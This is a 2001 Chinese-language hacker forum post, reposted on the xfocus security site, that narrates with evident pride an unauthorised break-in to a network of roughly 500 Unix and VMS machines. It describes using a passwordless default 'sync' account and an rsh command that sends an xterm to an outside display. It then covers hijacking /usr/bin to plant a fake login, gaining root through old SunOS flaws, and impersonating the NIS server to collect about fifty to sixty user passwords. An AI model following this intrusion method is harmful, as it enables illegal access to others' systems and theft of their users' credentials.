xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加文章 English Version

入侵思路


创建时间:2001-11-16
文章属性:转载
文章来源:freedemon@citiz.net
文章提交:inburst (inburst_at_263.net)

发信人:freedemon(freedemon),信区:灌水王潮
标题:我也来贴一篇 -- 咱们本门的功夫。不过比他就差远了。
发信站:安全焦点(2001-11-16 14:52:35)

无聊,上网逛逛,想起某地我还有一个网络有OpenVMS 7.5,半年没玩儿了,过去瞧瞧。

一瞧,顿然觉得失败,半年没见,那边的Admin竟然重新对所有机器进行了安全加强配置,而我当年竟然一时心软,没留一个隐蔽一点的后门 -- 连shadow都没拉回来 -- 失败,太失败了。

不甘心哪,我的500台大机 -- AIX,HP-UX,Tru64,Irix还有变态西西的VMS...

实在是不甘心,我一定要再拿回来!

好吧,开始扫描,再看看它有什么漏洞。

========================================================================

所有的机器都是用nis集中认证,用户home也都是nfs的,每种平台都坚持最少服务原则,开放的服务也都打了补丁的...呜呜呜,看来是没漏洞了吗?

试,试试试,再试!

没用,所有的远程溢出都没用,只有一台机器开了Finger,结果还告诉我:你的地址已被记录在案 -- 晕倒。

好吧,忽然,发现一台粉老粉老的东东,keep?
竟然是Sun OS 4.13,呵呵,拿来做留念的啊?
这台也是NFS服务器之一,showmount一下,竟然有两百多台机器nfs在这里。

服务开放:22,110,512,513,6000没了...

看来没希望啦?
老机有老机的应付方法,某些老系统可是存在一个却省账号 -- sync的哦。
而且很多系统中这个账号都是没有passwd的!好吧,就这么办。

ssh连接,试探一下,OK!果然没有密码...可惜,也没有shell :_<
sync账号的却省shell当然就是sync了嘛!

好像还是没有用。
ssh不行,咱们rlogin再试试看...不行,还是不行...

进不去?那咱们就让他出来...
rsh -l sync keep \"/usr/openwin/bin/xterm -display xfocus.com:0\"

不行,好像是超时,再试,还是不行,看来是做了某些设置了...又失败。

快绝望了...呜呜呜...Quack哪,再给我多一点点...

忽然间,从眼泪中看到了灵光一闪!能X?那我当然也能X进去啦。

Ok,xdmcp,query,连接...失败...还是不行那...
这回真的绝望了...睡觉去。

========================================================================

一觉醒来,到别的机器上看看,X登录到了两台机器,忽然之间灵机一动 -- 如果一台机器同时有几台机器Xdmcp的话,那X屏幕号就不是0了!而我的X一直设的:0!

改成:9,继续登录,几秒钟停顿之后,终于出现了激动人心的OpenWindow登录界面!激动呀!真的好激动!user:sync  pass:<null>,进去了!

几分钟之后,心情又从激动变成了空虚...
为什么上天对我如此的不公...那个弱智root,sync账号的xinitrc竟然有错误,我不但不能得到一个却省的xterm,而且能够运行的程序还只有两个 -- xedit和文件管理器 -- 没有一个shell,还是一切都等于0.

算了,这种情况也不是没有遇见过,至少sync还是和root同组的嘛,四处逛逛,要是它哪个文件权限设错,哪就,嘿嘿嘿嘿~~~

/.rhosts,读都不能读;/.xxxrc,都是只读;/.....没了
/etc,继续检查,发现hosts.allow,倒是我这个组可写,可惜修改了也没什么用...
/etc/passwd倒是可以看,可惜我不报多大希望crack它的...这边的密码强度我是早见识过 -- 除非是8位以上的穷举...

看来是没办法了...无意之间,逛到了/usr,幸运之神再一次降临到了我的脚下,哈哈,/usr -rwxrwxr--!

算你倒霉,竟然/usr属于我这个组,而且同组可写!虽然bin我不能修改...
好吧,冒一次险,我mv /usr/bin!

没有shell真的好痛苦呀,我还得忍受奇慢无比的X......点一下鼠标它要10分钟才能反应过来 -- 不愧是古董级得机器!

慢慢的,在文件管理其中执行了如下操作:
mv /usr/bin /usr/binn
mkdir /usr/bin
然后写了一个脚本,叫做sync,里面有一条命令,xterm什么的......嘿嘿嘿

哪边再登录一次... God!报错!/bin/login not found.
我竟然犯了那么危险的一个错误!
忘了这一点...好险,好吧,
mv /usr/bin/sync /usr/bin/login

再登录......终于,我这边的X缓慢的出现了一个term...松了一口气。
赶快把/usr/binn改回去,一面有人登录就麻烦了。

既然有了一个shell,后面就都简单了,从SunOS古老的漏洞中随便选几个出来,i am root!

既然是nis,su某用户就可以通行无阻啦!俺是良民嘛!

========================================================================
接下来的几天里,就是拿着良民证到处看看,最后选定一台HP-UX作为基地,用俺的独家利器得到了root,先备份回整个NIS数据库;然后让真正的NIS Server睡一会会儿觉,我就暂时替他看着,这一会儿嘛,当然会有很多用户到我这儿来报道啦,密码一个个等级好,差不多五六十个了。叫醒nis,我睡觉去了。

虽然只有五六十个普通用户,但是可是有500台各种平台的机器玩啊,俺又没那么黑,非要各个都是root.

重在学习嘛!

--
※ 来源:·安全焦点讨论区 www.xfocus.org·